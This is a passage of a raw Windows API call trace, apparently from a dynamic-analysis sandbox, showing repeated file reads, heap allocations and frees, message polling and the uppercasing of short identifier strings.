ReadFile (in: hFile=0x504, lpBuffer=0x37f4320, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37f4320*, lpNumberOfBytesRead=0x8cf4f8*=0x51aa, lpOverlapped=0x0) returned 1 [0211.909] ReadFile (in: hFile=0x504, lpBuffer=0x37f4320, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37f4320*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0211.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x51aa) returned 0x3864010 [0211.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e6020 | out: hHeap=0x2af0000) returned 1 [0211.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x51aa) returned 0x2a7a930 [0211.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3864010 | out: hHeap=0x2af0000) returned 1 [0211.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x51aa) returned 0x3864010 [0211.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3864010 | out: hHeap=0x2af0000) returned 1 [0211.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0211.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0211.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0211.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.914] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0211.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0211.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x51aa) returned 0x3864010 [0211.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0211.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x51aa) returned 0x2a7fae8 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0211.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0211.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0211.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0211.917] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0211.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0211.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0211.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0211.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0211.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0211.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0211.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0211.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0211.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0211.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0211.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0211.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0211.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0211.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0211.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0211.921] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0211.921] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0211.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0211.921] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0211.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0211.922] PeekMessageW (in: 